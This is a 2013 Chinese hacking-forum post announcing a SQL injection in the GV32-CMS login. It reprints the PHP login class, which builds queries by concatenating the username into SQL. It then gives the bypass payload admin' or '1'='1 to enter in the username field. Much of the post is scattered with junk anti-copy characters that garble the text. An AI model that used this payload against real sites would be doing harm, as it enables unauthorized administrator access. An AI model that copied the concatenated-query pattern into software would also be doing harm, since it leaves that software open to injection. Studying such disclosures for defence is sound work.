找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2683|回复: 0
打印 上一主题 下一主题

GV32CMS最新漏洞(暗月渗透测试团队原创)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 16:23:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0x01 简要描述:% D% U* F9 x% L- e; j, }
GV32-CMS免费开源企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统。
3 a5 s6 c' t) ?6 s, Z0x02 详细说明:
  • <?php
  • if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
  • class Login
  • {
  • function Login()
  • {
  • //echo 'Login';
  • }
  • function act( )
  • {
  • //缓存一天 //60 * 60 * 24 缓存时间 一天
  • $GLOBALS['Templ'] -> caching = true;
  • $GLOBALS['Templ'] -> cache_lifetime = 86400 ;
  • $GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); //版权
  • $GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
  • $GLOBALS['Templ'] -> display('login_tpl.html');
  • }
  • function actlogin( )
  • {
  • echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
  • $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
  • $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
  • $this -> logincount();
  • if($use_captchaval!=$_SESSION["Img"])
  • {
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • }else{
  • $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
  • //exit();
  • $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
  • if($adminInfo["emplyeeUser"]["use_id"])
  • {
  • $GLOBALS['WebSe'] -> SetSession( $adminInfo );
  • $nowtime = time();
  • $adminip = $GLOBALS['Helpe'] -> getip();
  • //登录成功更新用户信息
  • $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
  • $GLOBALS['MySql'] -> querySql($sqlup);
  • //登录成功!重置IP错误信息清0!
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql( $updateip );
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • //var_dump($_SESSION);
  • }else{
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • /*
  • header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • exit();
  • */
  • }
  • }
  • }
  • function logincount()
  • {
  • $adminip = $GLOBALS['Helpe'] -> getip();
  • $now = time();
  • if( $adminip!='Unknown' and $adminip!='' )
  • {
  • //查询记录是否存在
  • $sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
  • $useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
  • if($useripInfo["error_id"])
  • {
  • //超过一天。重置时间及数量
  • if( $useripInfo["start_time"] > ( $now + 86400 ) )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }elseif( $useripInfo["errorcount"] >= 20 )
  • {
  • $updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql( $updateip );
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }else{
  • if( $useripInfo["errorcount"] < 5 )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }elseif( $useripInfo["start_time"] > ( $now - 3600) )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }else{
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }
  • }
  • //时间未超过1小时,状态有效,数量是否超过5次
  • //未超过5次更新+1
  • }else{
  • $insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
  • $GLOBALS['MySql'] -> querySql($insertip);
  • }
  • }else{
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }
  • }
  • }
  • $Login = new Login();
  • ?>8 d2 r( X; y% t* K" W6 K
& O: Y, n3 |# N0 G1 [" b% i1 C
复制代码
% }- N* s: o' I: c经典语句重现
  • $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";/ }; p6 Y. F, f0 I2 g  R. I

+ j* r+ X. n. {# _' Q9 q5 U复制代码
. f# \0 N' A- b. D) V/ e: W原本以为注释就完事了 后来发现被过滤l 再看funpost函数 * [) |, H! q. g

& ^5 s+ g% g9 _3 W- B5 ]4 m# r1 l- w" M" x: j" n( S4 C
8 ~' J& ]" x+ d' A6 }4 t
0x03 漏洞证明:- x$ S" h; j6 m* |
登录用户处填写 admin' or '1'='1
: B2 G: U9 P6 q- Z# }2 w+ A% p1 }  A2 F+ q2 u4 R
4 {3 s+ {* b7 R; M( M, {" x% M

/ x' b) d8 q! a) Z: _
. o8 H( _2 w5 q3 I0 B3 M* V

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表